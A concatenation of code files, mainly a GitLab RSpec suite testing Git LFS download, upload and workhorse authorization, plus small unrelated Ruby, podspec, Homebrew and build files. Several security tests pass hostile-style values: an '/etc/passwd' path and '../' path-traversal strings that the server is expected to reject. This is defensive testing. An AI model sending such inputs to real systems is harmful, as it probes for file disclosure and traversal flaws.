it_behaves_like 'can download LFS only from own projects' do
# We render 404, to prevent data leakage about existence of the project
let(:other_project_status) { 404 }
end
end
context 'does not have user' do
let(:build) { create(:ci_build, :running, pipeline: pipeline) }
it_behaves_like 'can download LFS only from own projects' do
# We render 404, to prevent data leakage about existence of the project
let(:other_project_status) { 404 }
end
end
end
end
context 'without required headers' do
let(:authorization) { authorize_user }
it 'responds with status 404' do
expect(response).to have_gitlab_http_status(404)
end
end
end
end
describe 'when handling lfs batch request' do
let(:update_lfs_permissions) { }
let(:update_user_permissions) { }
before do
enable_lfs
update_lfs_permissions
update_user_permissions
post_lfs_json "#{project.http_url_to_repo}/info/lfs/objects/batch", body, headers
end
describe 'download' do
let(:project) { create(:project) }
let(:body) do
{
'operation' => 'download',
'objects' => [
{ 'oid' => sample_oid,
'size' => sample_size }
]
}
end
      shared_examples 'an authorized request' do
context 'when downloading an lfs object that is assigned to our project' do
let(:update_lfs_permissions) do
project.lfs_objects << lfs_object
end
it 'responds with status 200' do
expect(response).to have_gitlab_http_status(200)
end
        it 'responds with href to download' do
expect(json_response).to eq({
'objects' => [
{
'oid' => sample_oid,
'size' => sample_size,
'actions' => {
'download' => {
'href' => "#{project.http_url_to_repo}/gitlab-lfs/objects/#{sample_oid}",
'header' => { 'Authorization' => authorization }
}
}
}
]
})
end
end
context 'when downloading an lfs object that is assigned to other project' do
let(:other_project) { create(:project) }
let(:update_lfs_permissions) do
other_project.lfs_objects << lfs_object
end
it 'responds with status 200' do
expect(response).to have_gitlab_http_status(200)
end
        it 'responds with a 404 error for the object' do
expect(json_response).to eq({
'objects' => [
{
'oid' => sample_oid,
'size' => sample_size,
'error' => {
'code' => 404,
'message' => "Object does not exist on the server or you don't have permissions to access it"
}
}
]
})
end
end
context 'when downloading a lfs object that does not exist' do
let(:body) do
{
'operation' => 'download',
'objects' => [
{ 'oid' => '91eff75a492a3ed0dfcb544d7f31326bc4014c8551849c192fd1e48d4dd2c897',
'size' => 1575078 }
]
}
end
it 'responds with status 200' do
expect(response).to have_gitlab_http_status(200)
end
        it 'responds with a 404 for the specific object' do
expect(json_response).to eq({
'objects' => [
{
'oid' => '91eff75a492a3ed0dfcb544d7f31326bc4014c8551849c192fd1e48d4dd2c897',
'size' => 1575078,
'error' => {
'code' => 404,
'message' => "Object does not exist on the server or you don't have permissions to access it"
}
}
]
})
end
end
context 'when downloading one new and one existing lfs object' do
let(:body) do
{
'operation' => 'download',
'objects' => [
{ 'oid' => '91eff75a492a3ed0dfcb544d7f31326bc4014c8551849c192fd1e48d4dd2c897',
'size' => 1575078 },
{ 'oid' => sample_oid,
'size' => sample_size }
]
}
end
let(:update_lfs_permissions) do
project.lfs_objects << lfs_object
end
it 'responds with status 200' do
expect(response).to have_gitlab_http_status(200)
end
        it 'responds with a 404 for the new object and a download link for the existing object' do
expect(json_response).to eq({
'objects' => [
{
'oid' => '91eff75a492a3ed0dfcb544d7f31326bc4014c8551849c192fd1e48d4dd2c897',
'size' => 1575078,
'error' => {
'code' => 404,
'message' => "Object does not exist on the server or you don't have permissions to access it"
}
},
{
'oid' => sample_oid,
'size' => sample_size,
'actions' => {
'download' => {
'href' => "#{project.http_url_to_repo}/gitlab-lfs/objects/#{sample_oid}",
'header' => { 'Authorization' => authorization }
}
}
}
]
})
end
end
end
context 'when user is authenticated' do
let(:authorization) { authorize_user }
let(:update_user_permissions) do
project.add_role(user, role)
end
      it_behaves_like 'an authorized request' do
let(:role) { :reporter }
end
        context 'when user is not a member of the project' do
let(:update_user_permissions) { nil }
it 'responds with 404' do
expect(response).to have_gitlab_http_status(404)
end
end
context 'when user does not have download access' do
let(:role) { :guest }
it 'responds with 403' do
expect(response).to have_gitlab_http_status(403)
end
end
end
context 'when build is authorized as' do
let(:authorization) { authorize_ci_project }
let(:update_lfs_permissions) do
project.lfs_objects << lfs_object
end
shared_examples 'can download LFS only from own projects' do
context 'for own project' do
let(:pipeline) { create(:ci_empty_pipeline, project: project) }
let(:update_user_permissions) do
project.add_reporter(user)
end
          it_behaves_like 'an authorized request'
end
context 'for other project' do
let(:other_project) { create(:project) }
let(:pipeline) { create(:ci_empty_pipeline, project: other_project) }
it 'rejects downloading code' do
expect(response).to have_gitlab_http_status(other_project_status)
end
end
end
context 'administrator' do
let(:user) { create(:admin) }
let(:build) { create(:ci_build, :running, pipeline: pipeline, user: user) }
it_behaves_like 'can download LFS only from own projects' do
          # We render 403 because an administrator normally does have access
let(:other_project_status) { 403 }
end
end
context 'regular user' do
let(:user) { create(:user) }
let(:build) { create(:ci_build, :running, pipeline: pipeline, user: user) }
it_behaves_like 'can download LFS only from own projects' do
# We render 404, to prevent data leakage about existence of the project
let(:other_project_status) { 404 }
end
end
context 'does not have user' do
let(:build) { create(:ci_build, :running, pipeline: pipeline) }
it_behaves_like 'can download LFS only from own projects' do
# We render 404, to prevent data leakage about existence of the project
let(:other_project_status) { 404 }
end
end
end
context 'when user is not authenticated' do
describe 'is accessing public project' do
let(:project) { create(:project, :public) }
let(:update_lfs_permissions) do
project.lfs_objects << lfs_object
end
        it 'responds with status 200' do
expect(response).to have_gitlab_http_status(200)
end
it 'responds with status 200 and href to download' do
expect(json_response).to eq({
'objects' => [
{
'oid' => sample_oid,
'size' => sample_size,
'authenticated' => true,
'actions' => {
'download' => {
'href' => "#{project.http_url_to_repo}/gitlab-lfs/objects/#{sample_oid}",
'header' => {}
}
}
}
]
})
end
end
describe 'is accessing non-public project' do
let(:update_lfs_permissions) do
project.lfs_objects << lfs_object
end
it 'responds with authorization required' do
expect(response).to have_gitlab_http_status(401)
end
end
end
end
describe 'upload' do
let(:project) { create(:project, :public) }
let(:body) do
{
'operation' => 'upload',
'objects' => [
{ 'oid' => sample_oid,
'size' => sample_size }
]
}
end
shared_examples 'pushes new LFS objects' do
let(:sample_size) { 150.megabytes }
let(:sample_oid) { '91eff75a492a3ed0dfcb544d7f31326bc4014c8551849c192fd1e48d4dd2c897' }
it 'responds with upload hypermedia link' do
expect(response).to have_gitlab_http_status(200)
expect(json_response['objects']).to be_kind_of(Array)
expect(json_response['objects'].first['oid']).to eq(sample_oid)
expect(json_response['objects'].first['size']).to eq(sample_size)
expect(json_response['objects'].first['actions']['upload']['href']).to eq("#{Gitlab.config.gitlab.url}/#{project.full_path}.git/gitlab-lfs/objects/#{sample_oid}/#{sample_size}")
expect(json_response['objects'].first['actions']['upload']['header']).to eq('Authorization' => authorization)
end
end
describe 'when request is authenticated' do
describe 'when user has project push access' do
let(:authorization) { authorize_user }
let(:update_user_permissions) do
project.add_developer(user)
end
context 'when pushing an lfs object that already exists' do
let(:other_project) { create(:project) }
let(:update_lfs_permissions) do
other_project.lfs_objects << lfs_object
end
it 'responds with status 200' do
expect(response).to have_gitlab_http_status(200)
end
          it 'responds with an upload link and does not yet link the object to the project' do
expect(json_response['objects']).to be_kind_of(Array)
expect(json_response['objects'].first['oid']).to eq(sample_oid)
expect(json_response['objects'].first['size']).to eq(sample_size)
expect(lfs_object.projects.pluck(:id)).not_to include(project.id)
expect(lfs_object.projects.pluck(:id)).to include(other_project.id)
expect(json_response['objects'].first['actions']['upload']['href']).to eq("#{project.http_url_to_repo}/gitlab-lfs/objects/#{sample_oid}/#{sample_size}")
expect(json_response['objects'].first['actions']['upload']['header']).to eq('Authorization' => authorization)
end
end
context 'when pushing a lfs object that does not exist' do
it_behaves_like 'pushes new LFS objects'
end
context 'when pushing one new and one existing lfs object' do
let(:body) do
{
'operation' => 'upload',
'objects' => [
{ 'oid' => '91eff75a492a3ed0dfcb544d7f31326bc4014c8551849c192fd1e48d4dd2c897',
'size' => 1575078 },
{ 'oid' => sample_oid,
'size' => sample_size }
]
}
end
let(:update_lfs_permissions) do
project.lfs_objects << lfs_object
end
it 'responds with status 200' do
expect(response).to have_gitlab_http_status(200)
end
it 'responds with upload hypermedia link for the new object' do
expect(json_response['objects']).to be_kind_of(Array)
expect(json_response['objects'].first['oid']).to eq("91eff75a492a3ed0dfcb544d7f31326bc4014c8551849c192fd1e48d4dd2c897")
expect(json_response['objects'].first['size']).to eq(1575078)
expect(json_response['objects'].first['actions']['upload']['href']).to eq("#{project.http_url_to_repo}/gitlab-lfs/objects/91eff75a492a3ed0dfcb544d7f31326bc4014c8551849c192fd1e48d4dd2c897/1575078")
expect(json_response['objects'].first['actions']['upload']['header']).to eq("Authorization" => authorization)
expect(json_response['objects'].last['oid']).to eq(sample_oid)
expect(json_response['objects'].last['size']).to eq(sample_size)
expect(json_response['objects'].last).not_to have_key('actions')
end
end
end
context 'when user does not have push access' do
let(:authorization) { authorize_user }
it 'responds with 403' do
expect(response).to have_gitlab_http_status(403)
end
end
context 'when build is authorized' do
let(:authorization) { authorize_ci_project }
context 'build has an user' do
let(:user) { create(:user) }
context 'tries to push to own project' do
let(:build) { create(:ci_build, :running, pipeline: pipeline, user: user) }
it 'responds with 403 (not 404 because project is public)' do
expect(response).to have_gitlab_http_status(403)
end
end
context 'tries to push to other project' do
let(:other_project) { create(:project) }
let(:pipeline) { create(:ci_empty_pipeline, project: other_project) }
let(:build) { create(:ci_build, :running, pipeline: pipeline, user: user) }
            # I'm not sure what this tests differently from the previous test
it 'responds with 403 (not 404 because project is public)' do
expect(response).to have_gitlab_http_status(403)
end
end
end
context 'does not have user' do
let(:build) { create(:ci_build, :running, pipeline: pipeline) }
it 'responds with 403 (not 404 because project is public)' do
expect(response).to have_gitlab_http_status(403)
end
end
end
context 'when deploy key has project push access' do
let(:key) { create(:deploy_key) }
let(:authorization) { authorize_deploy_key }
let(:update_user_permissions) do
project.deploy_keys_projects.create(deploy_key: key, can_push: true)
end
it_behaves_like 'pushes new LFS objects'
end
end
context 'when user is not authenticated' do
context 'when user has push access' do
let(:update_user_permissions) do
project.add_master(user)
end
it 'responds with status 401' do
expect(response).to have_gitlab_http_status(401)
end
end
context 'when user does not have push access' do
it 'responds with status 401' do
expect(response).to have_gitlab_http_status(401)
end
end
end
end
describe 'unsupported' do
let(:project) { create(:project) }
let(:authorization) { authorize_user }
let(:body) do
{
'operation' => 'other',
'objects' => [
{ 'oid' => sample_oid,
'size' => sample_size }
]
}
end
it 'responds with status 404' do
expect(response).to have_gitlab_http_status(404)
end
end
end
describe 'when handling lfs batch request on a read-only GitLab instance' do
let(:authorization) { authorize_user }
let(:project) { create(:project) }
let(:path) { "#{project.http_url_to_repo}/info/lfs/objects/batch" }
let(:body) do
{ 'objects' => [{ 'oid' => sample_oid, 'size' => sample_size }] }
end
before do
allow(Gitlab::Database).to receive(:read_only?) { true }
project.add_master(user)
enable_lfs
end
it 'responds with a 200 message on download' do
post_lfs_json path, body.merge('operation' => 'download'), headers
expect(response).to have_gitlab_http_status(200)
end
it 'responds with a 403 message on upload' do
post_lfs_json path, body.merge('operation' => 'upload'), headers
expect(response).to have_gitlab_http_status(403)
expect(json_response).to include('message' => 'You cannot write to this read-only GitLab instance.')
end
end
describe 'when pushing a lfs object' do
before do
enable_lfs
end
shared_examples 'unauthorized' do
context 'and request is sent by gitlab-workhorse to authorize the request' do
before do
put_authorize
end
it 'responds with status 401' do
expect(response).to have_gitlab_http_status(401)
end
end
context 'and request is sent by gitlab-workhorse to finalize the upload' do
before do
put_finalize
end
it 'responds with status 401' do
expect(response).to have_gitlab_http_status(401)
end
end
context 'and request is sent with a malformed headers' do
before do
put_finalize('/etc/passwd')
end
it 'does not recognize it as a valid lfs command' do
expect(response).to have_gitlab_http_status(401)
end
end
end
shared_examples 'forbidden' do
context 'and request is sent by gitlab-workhorse to authorize the request' do
before do
put_authorize
end
it 'responds with 403' do
expect(response).to have_gitlab_http_status(403)
end
end
context 'and request is sent by gitlab-workhorse to finalize the upload' do
before do
put_finalize
end
it 'responds with 403' do
expect(response).to have_gitlab_http_status(403)
end
end
context 'and request is sent with a malformed headers' do
before do
put_finalize('/etc/passwd')
end
it 'does not recognize it as a valid lfs command' do
expect(response).to have_gitlab_http_status(403)
end
end
end
describe 'to one project' do
let(:project) { create(:project) }
describe 'when user is authenticated' do
let(:authorization) { authorize_user }
describe 'when user has push access to the project' do
before do
project.add_developer(user)
end
context 'and the request bypassed workhorse' do
it 'raises an exception' do
expect { put_authorize(verified: false) }.to raise_error JWT::DecodeError
end
end
context 'and request is sent by gitlab-workhorse to authorize the request' do
shared_examples 'a valid response' do
before do
put_authorize
end
it 'responds with status 200' do
expect(response).to have_gitlab_http_status(200)
end
it 'uses the gitlab-workhorse content type' do
expect(response.content_type.to_s).to eq(Gitlab::Workhorse::INTERNAL_API_CONTENT_TYPE)
end
end
shared_examples 'a local file' do
it_behaves_like 'a valid response' do
it 'responds with status 200, location of lfs store and object details' do
expect(json_response['TempPath']).to eq(LfsObjectUploader.workhorse_local_upload_path)
expect(json_response['RemoteObject']).to be_nil
expect(json_response['LfsOid']).to eq(sample_oid)
expect(json_response['LfsSize']).to eq(sample_size)
end
end
end
context 'when using local storage' do
it_behaves_like 'a local file'
end
context 'when using remote storage' do
context 'when direct upload is enabled' do
before do
stub_lfs_object_storage(enabled: true, direct_upload: true)
end
it_behaves_like 'a valid response' do
it 'responds with status 200, location of lfs remote store and object details' do
expect(json_response['TempPath']).to eq(LfsObjectUploader.workhorse_local_upload_path)
expect(json_response['RemoteObject']).to have_key('ID')
expect(json_response['RemoteObject']).to have_key('GetURL')
expect(json_response['RemoteObject']).to have_key('StoreURL')
expect(json_response['RemoteObject']).to have_key('DeleteURL')
expect(json_response['LfsOid']).to eq(sample_oid)
expect(json_response['LfsSize']).to eq(sample_size)
end
end
end
context 'when direct upload is disabled' do
before do
stub_lfs_object_storage(enabled: true, direct_upload: false)
end
it_behaves_like 'a local file'
end
end
end
context 'and request is sent by gitlab-workhorse to finalize the upload' do
before do
put_finalize
end
it 'responds with status 200' do
expect(response).to have_gitlab_http_status(200)
end
        it 'links the lfs object to the project' do
expect(lfs_object.projects.pluck(:id)).to include(project.id)
end
end
context 'and workhorse requests upload finalize for a new lfs object' do
before do
lfs_object.destroy
end
context 'with object storage disabled' do
it "doesn't attempt to migrate file to object storage" do
expect(ObjectStorage::BackgroundMoveWorker).not_to receive(:perform_async)
put_finalize(with_tempfile: true)
end
end
context 'with object storage enabled' do
context 'and direct upload enabled' do
let!(:fog_connection) do
stub_lfs_object_storage(direct_upload: true)
end
['123123', '../../123123'].each do |remote_id|
context "with invalid remote_id: #{remote_id}" do
subject do
put_finalize(with_tempfile: true, args: {
'file.remote_id' => remote_id
})
end
it 'responds with status 403' do
subject
expect(response).to have_gitlab_http_status(403)
end
end
end
context 'with valid remote_id' do
before do
fog_connection.directories.get('lfs-objects').files.create(
key: 'tmp/upload/12312300',
body: 'content'
)
end
subject do
put_finalize(with_tempfile: true, args: {
'file.remote_id' => '12312300',
'file.name' => 'name'
})
end
it 'responds with status 200' do
subject
expect(response).to have_gitlab_http_status(200)
end
                it 'links the lfs object to the project' do
subject
expect(LfsObject.last.projects).to include(project)
end
                it 'stores a valid file' do
subject
expect(LfsObject.last.file_store).to eq(ObjectStorage::Store::REMOTE)
expect(LfsObject.last.file).to be_exists
end
end
end
context 'and background upload enabled' do
before do
stub_lfs_object_storage(background_upload: true)
end
it 'schedules migration of file to object storage' do
expect(ObjectStorage::BackgroundMoveWorker).to receive(:perform_async).with('LfsObjectUploader', 'LfsObject', :file, kind_of(Numeric))
put_finalize(with_tempfile: true)
end
end
end
end
context 'invalid tempfiles' do
before do
lfs_object.destroy
end
it 'rejects slashes in the tempfile name (path traversal)' do
put_finalize('../bar', with_tempfile: true)
expect(response).to have_gitlab_http_status(403)
end
end
end
describe 'and user does not have push access' do
before do
project.add_reporter(user)
end
it_behaves_like 'forbidden'
end
end
context 'when build is authorized' do
let(:authorization) { authorize_ci_project }
context 'build has an user' do
let(:user) { create(:user) }
context 'tries to push to own project' do
let(:build) { create(:ci_build, :running, pipeline: pipeline, user: user) }
before do
project.add_developer(user)
put_authorize
end
it 'responds with 403 (not 404 because the build user can read the project)' do
expect(response).to have_gitlab_http_status(403)
end
end
context 'tries to push to other project' do
let(:other_project) { create(:project) }
let(:pipeline) { create(:ci_empty_pipeline, project: other_project) }
let(:build) { create(:ci_build, :running, pipeline: pipeline, user: user) }
before do
put_authorize
end
it 'responds with 404 (do not leak non-public project existence)' do
expect(response).to have_gitlab_http_status(404)
end
end
end
context 'does not have user' do
let(:build) { create(:ci_build, :running, pipeline: pipeline) }
before do
put_authorize
end
it 'responds with 404 (do not leak non-public project existence)' do
expect(response).to have_gitlab_http_status(404)
end
end
end
context 'for unauthenticated' do
it_behaves_like 'unauthorized'
end
end
describe 'to a forked project' do
let(:upstream_project) { create(:project, :public) }
let(:project_owner) { create(:user) }
let(:project) { fork_project(upstream_project, project_owner) }
describe 'when user is authenticated' do
let(:authorization) { authorize_user }
describe 'when user has push access to the project' do
before do
project.add_developer(user)
end
context 'and request is sent by gitlab-workhorse to authorize the request' do
before do
put_authorize
end
it 'responds with status 200' do
expect(response).to have_gitlab_http_status(200)
end
          it 'responds with the location of the lfs store and object details' do
expect(json_response['TempPath']).to eq(LfsObjectUploader.workhorse_local_upload_path)
expect(json_response['LfsOid']).to eq(sample_oid)
expect(json_response['LfsSize']).to eq(sample_size)
end
end
context 'and request is sent by gitlab-workhorse to finalize the upload' do
before do
put_finalize
end
it 'responds with status 200' do
expect(response).to have_gitlab_http_status(200)
end
          it 'links the lfs object to the source project' do
expect(lfs_object.projects.pluck(:id)).to include(upstream_project.id)
end
end
end
describe 'and user does not have push access' do
it_behaves_like 'forbidden'
end
end
context 'when build is authorized' do
let(:authorization) { authorize_ci_project }
before do
put_authorize
end
context 'build has an user' do
let(:user) { create(:user) }
context 'tries to push to own project' do
let(:build) { create(:ci_build, :running, pipeline: pipeline, user: user) }
it 'responds with 403 (not 404 because project is public)' do
expect(response).to have_gitlab_http_status(403)
end
end
context 'tries to push to other project' do
let(:other_project) { create(:project) }
let(:pipeline) { create(:ci_empty_pipeline, project: other_project) }
let(:build) { create(:ci_build, :running, pipeline: pipeline, user: user) }
          # I'm not sure what this tests differently from the previous test
it 'responds with 403 (not 404 because project is public)' do
expect(response).to have_gitlab_http_status(403)
end
end
end
context 'does not have user' do
let(:build) { create(:ci_build, :running, pipeline: pipeline) }
it 'responds with 403 (not 404 because project is public)' do
expect(response).to have_gitlab_http_status(403)
end
end
end
context 'for unauthenticated' do
it_behaves_like 'unauthorized'
end
describe 'and second project not related to fork or a source project' do
let(:second_project) { create(:project) }
let(:authorization) { authorize_user }
before do
second_project.add_master(user)
upstream_project.lfs_objects << lfs_object
end
context 'when pushing the same lfs object to the second project' do
before do
put "#{second_project.http_url_to_repo}/gitlab-lfs/objects/#{sample_oid}/#{sample_size}", nil,
headers.merge('X-Gitlab-Lfs-Tmp' => lfs_tmp_file).compact
end
it 'responds with status 200' do
expect(response).to have_gitlab_http_status(200)
end
it 'links the lfs object to the project' do
expect(lfs_object.projects.pluck(:id)).to include(second_project.id, upstream_project.id)
end
end
end
end
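  # The helpers below mimic the two-step gitlab-workhorse upload flow:
  # `put_authorize` hits the `.../authorize` endpoint (signed with the workhorse
  # JWT header unless `verified: false` is passed), and `put_finalize` sends the
  # finalize request with the file.path/file.name (or file.remote_id) fields
  # that workhorse would normally provide.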
def put_authorize(verified: true)
authorize_headers = headers
authorize_headers.merge!(workhorse_internal_api_request_header) if verified
put "#{project.http_url_to_repo}/gitlab-lfs/objects/#{sample_oid}/#{sample_size}/authorize", nil, authorize_headers
end
def put_finalize(lfs_tmp = lfs_tmp_file, with_tempfile: false, args: {})
upload_path = LfsObjectUploader.workhorse_local_upload_path
file_path = upload_path + '/' + lfs_tmp if lfs_tmp
if with_tempfile
FileUtils.mkdir_p(upload_path)
FileUtils.touch(file_path)
end
extra_args = {
'file.path' => file_path,
'file.name' => File.basename(file_path)
}
put_finalize_with_args(args.merge(extra_args).compact)
end
def put_finalize_with_args(args)
put "#{project.http_url_to_repo}/gitlab-lfs/objects/#{sample_oid}/#{sample_size}", args, headers
end
def lfs_tmp_file
"#{sample_oid}012345678"
end
end
def enable_lfs
allow(Gitlab.config.lfs).to receive(:enabled).and_return(true)
end
def authorize_ci_project
ActionController::HttpAuthentication::Basic.encode_credentials('gitlab-ci-token', build.token)
end
def authorize_user
ActionController::HttpAuthentication::Basic.encode_credentials(user.username, user.password)
end
def authorize_deploy_key
ActionController::HttpAuthentication::Basic.encode_credentials("lfs+deploy-key-#{key.id}", Gitlab::LfsToken.new(key).token)
end
def authorize_user_key
ActionController::HttpAuthentication::Basic.encode_credentials(user.username, Gitlab::LfsToken.new(user).token)
end
def post_lfs_json(url, body = nil, headers = nil)
post(url, body.try(:to_json), (headers || {}).merge('Content-Type' => LfsRequest::CONTENT_TYPE))
end
def json_response
@json_response ||= JSON.parse(response.body)
end
end
| 32.945363 | 210 | 0.570493 |
e83105c62fe7971c9d5307c775427e30bc2a915a | 143 | module OfficeUiFabric
module Rails
FABRIC_CORE_VERSION = "4.0.0"
FABRIC_JS_VERSION = "3.0.0-beta2"
VERSION = "4.0.0.2"
end
end
| 17.875 | 37 | 0.664336 |
6ab067120e5a68e0fabd866fc121747ef7bddc05 | 626 | Pod::Spec.new do |s|
s.name = 'VOLoginCommponet'
s.ios.deployment_target = "9.0"
s.version = '1.1.2'
s.license = "Copyright (c) 2018年 Gavin. All rights reserved."
s.homepage = 'https://github.com/feidaoGavin/VOLoginCommponet.git'
s.summary = 'VOLoginCommponet登录模块'
s.author = '[email protected]'
s.source = {
:git => 'https://github.com/feidaoGavin/VOLoginCommponet.git',
:tag => s.version.to_s
}
s.requires_arc = true
s.source_files = 'VOLoginCommponet', 'VOLoginCommponet/**/*.{h,m}'
s.dependency 'AFNetworking', '3.1.0'
s.dependency 'VOToleranceTool', '0.0.2'
end
| 34.777778 | 71 | 0.664537 |
2672ca127d7cae9418cb227cd407f41101c00693 | 472 | class FontBigShouldersStencilText < Formula
head "https://github.com/google/fonts/raw/main/ofl/bigshouldersstenciltext/BigShouldersStencilText%5Bwght%5D.ttf", verified: "github.com/google/fonts/"
desc "Big Shoulders Stencil Text"
desc "Superfamily of condensed American Gothic typefaces"
homepage "https://fonts.google.com/specimen/Big+Shoulders+Stencil+Text"
def install
(share/"fonts").install "BigShouldersStencilText[wght].ttf"
end
test do
end
end
| 39.333333 | 153 | 0.78178 |
26d2258cd865eb7a26b521e8f5e9114e73540dd0 | 1,047 | name "pip3"
default_version "21.3.1"
dependency "setuptools3"
source :url => "https://github.com/pypa/pip/archive/#{version}.tar.gz",
:sha256 => "cbfb6a0b5bc2d1e4b4647729ee5b944bb313c8ffd9ff83b9d2e0f727f0c79714",
:extract => :seven_zip
relative_path "pip-#{version}"
build do
license "MIT"
license_file "https://raw.githubusercontent.com/pypa/pip/main/LICENSE.txt"
if ohai["platform"] == "windows"
python_bin = "#{windows_safe_path(python_3_embedded)}\\python.exe"
python_prefix = "#{windows_safe_path(python_3_embedded)}"
else
python_bin = "#{install_dir}/embedded/bin/python3"
python_prefix = "#{install_dir}/embedded"
end
command "#{python_bin} setup.py install --prefix=#{python_prefix}"
if ohai["platform"] != "windows"
block do
FileUtils.rm_f(Dir.glob("#{install_dir}/embedded/lib/python3.*/site-packages/pip-*-py3.*.egg/pip/_vendor/distlib/*.exe"))
FileUtils.rm_f(Dir.glob("#{install_dir}/embedded/lib/python3.*/site-packages/pip/_vendor/distlib/*.exe"))
end
end
end
| 31.727273 | 127 | 0.707736 |
183240f488c8695ceba45174ff0478ad4e1281d5 | 1,305 | module JSON
class Schema
class OneOfAttribute < Attribute
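      # `oneOf` requires the data to match exactly one of the listed schemas:
      # every failing sub-schema increments validation_errors, so a count of
      # schemas.length - 1 means exactly one schema accepted the data.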
def self.validate(current_schema, data, fragments, processor, validator, options = {})
validation_errors = 0
current_schema.schema['oneOf'].each do |element|
          schema = JSON::Schema.new(element, current_schema.uri, validator)
begin
# need to raise exceptions on error because
# schema.validate doesn't reliably return true/false
schema.validate(data,fragments,processor,options.merge(:record_errors => false))
rescue ValidationError
validation_errors += 1
end
end
case validation_errors
when current_schema.schema['oneOf'].length - 1 # correct, matched only one
message = nil
when current_schema.schema['oneOf'].length # didn't match any
message = "The property '#{build_fragment(fragments)}' of type #{data.class} did not match any of the required schemas"
else # too many matches
message = "The property '#{build_fragment(fragments)}' of type #{data.class} matched more than one of the required schemas"
end
validation_error(processor, message, fragments, current_schema, self, options[:record_errors]) if message
end
end
end
end
| 39.545455 | 133 | 0.658238 |
1c08ab9bbef8272a86bf247994942332ff4e1c84 | 131 | # frozen_string_literal: true
module CXML
class SupplierSetup < DocumentNode
accessible_nodes %i[
url
]
end
end
| 13.1 | 36 | 0.694656 |
bf00033b781d4f23f72b2efb9cfd105a57f03225 | 2,408 | require "spec_helper"
require "mvcli/validatable"
describe "a validator" do
use_natural_assertions
Given(:object) { Object.new }
Given(:validator) { MVCLI::Validatable::Validator.new }
Given(:validation) { validator.validate object }
Given(:violations) { validation.violations }
context "when it validates a field that does not exist on the object" do
Given { validator.validates(:does_not_exist, "invalid") {} }
When(:validation) { validator.validate object }
Then { not validation.errors[:does_not_exist].empty? }
Then { not validation.valid? }
end
describe "validating a child" do
Given { validator.validates_child(:some_child) }
context "when it is nil" do
When(:validation) { validator.validate(double(:Object, :some_child => nil)) }
Then { validation.valid? }
end
context "when it does not exist" do
When(:validation) { validator.validate(Object.new) }
Then { not validation.errors[:some_child].nil? }
And { not validation.valid? }
end
end
describe "validating a nil field" do
Given { object.stub(:property) {nil} }
context "when the validate-on-nil option is passed" do
When { validator.validates(:property, "check nil", nil: true) {false} }
Then { not validation.valid? }
And { not validation.violations[:property].empty? }
end
context "when the validate on nil option is not passed" do
When { validator.validates(:property, "check nil") {false}}
Then { validation.valid? }
end
end
describe "validating each element in an enumerable" do
Given { validator.validates(:foodles, "invalid", nil: true) {|foodle| not foodle.nil? } }
context "when there are invalid elements in the enumerable" do
When { object.stub(:foodles) {["not nil", nil, "not nil"]} }
Then { not validation.valid? }
Then { violations.has_key? "foodles[1]" }
And { not violations.has_key? "foodles"}
end
end
describe "validating an enumerable itself" do
Given { object.stub(:array) {array} }
Given { validator.validates(:array, "invalid", each: false) {|a| a.length < 3} }
context "when it is valid" do
When(:array) { [1,2] }
Then { validation.valid? }
end
context "when it is invalid" do
When(:array) { [1,2,3] }
Then { not validation.valid? }
And {not violations["array"].empty?}
end
end
end
| 35.940299 | 93 | 0.659053 |
79d66660f6346fae3540f3c26229f6a525c7e096 | 749 | # frozen_string_literal: true
Rails.application.routes.draw do
devise_for :fans, :controllers => {:sessions => "sessions"}
namespace :last_fm do
resource :connection, :only => %i[ new show destroy ]
end
get "/auth/spotify/callback", :to => "spotify/connections#create"
namespace :spotify do
resource :connection, :only => %i[ destroy ]
end
namespace :my do
resource :dashboard, :only => :show
resource :account, :only => %i[ show update destroy ]
resources :albums, :only => [] do
resource :purchases, :only => %i[ create destroy ]
end
get "/purchases/:fan_uuid/:album_uuid" => "purchases#new",
:as => :purchase # rubocop:disable Layout/HashAlignment
end
root :to => "home#index"
end
| 25.827586 | 67 | 0.655541 |
62e654e1361c92ca970864d8dcc56975fff81710 | 1,428 | class AvailabilityStatusUpdateJob < ApplicationJob
queue_as :availability
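  # Expected Kafka payload (a JSON string), inferred from the keys read below:
  #   {"resource_type": "Endpoint", "resource_id": 123,
  #    "status": "available", "error": "optional error detail"}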
def perform(event, headers)
payload = JSON.parse(event)
model_class = payload["resource_type"].classify.constantize
validate_resource_type(model_class)
record_id = payload["resource_id"]
object = model_class.find(record_id)
options = {
:availability_status => payload["status"],
:last_checked_at => Time.now.utc
}
options[:availability_status_error] = payload["error"] if %(Endpoint Application Authentication).include?(model_class.name)
options[:last_available_at] = options[:last_checked_at] if options[:availability_status] == 'available'
object.update!(options)
object.raise_event_for_update(options.keys, headers)
rescue NameError
Sidekiq.logger.error("Invalid resource_type #{payload["resource_type"]}")
rescue ActiveRecord::RecordNotFound
Sidekiq.logger.error("Could not find #{model_class} with id #{record_id}")
rescue ActiveRecord::RecordInvalid
Sidekiq.logger.error("Invalid status #{payload["status"]}")
rescue => e
Sidekiq.logger.error(["Something is wrong when processing Kafka message: ", e.message, *e.backtrace].join($RS))
end
def validate_resource_type(model_class)
# For security reason only accept explicitly listed models
raise NameError unless [Application, Authentication, Endpoint, Source].include?(model_class)
end
end
| 36.615385 | 127 | 0.742297 |
61ccb73d69b1c9d7ee4e1d0498bfe8d408fae812 | 241 | # -*- encoding: utf-8 -*-
require_relative 'common'
require 'hexapdf/encryption/fast_arc4'
describe HexaPDF::Encryption::FastARC4 do
include ARC4EncryptionTests
before do
@algorithm_class = HexaPDF::Encryption::FastARC4
end
end
| 18.538462 | 52 | 0.755187 |
6a9e9582b3cb4458fce43293bea6f030c24ebc39 | 39 |
module Xample
VERSION = "0.0.1"
end
| 7.8 | 19 | 0.641026 |
5d5e515f8c092fbb120bb9053c1e494821725523 | 3,880 | # -*- coding: utf-8 -*-
require 'pp'
require 'ostruct'
require 'uri'
require '../lib/jekyll/msgcat'
# mock
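# Site_ru fakes the Liquid render context that Jekyll::Msgcat reads: a site
# configured with the 'ru' msgcat locale and a current page at /foo/bar.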
module Site_ru
def initialize *a, &b
super
@context = OpenStruct.new("registers" => {
site: OpenStruct.new("config" => {
'msgcat' => {
'locale' => 'ru'
}
}),
page: {
'url' => '/foo/bar'
}
})
@context_orig = @context
end
end
require 'minitest/autorun'
class MsgcatTest < Minitest::Unit::TestCase
include Site_ru
include Jekyll::Msgcat
def setup
@context = @context_orig
# pp @context
end
def test_mc_empty
refute mc nil
assert_equal "", mc("")
end
def test_mc_no_msgcat_entry
@context.registers[:site].config['msgcat'] = nil
assert_equal "", mc("")
assert_equal "News", mc("News")
end
def test_mc
assert_equal "Новости", mc("News")
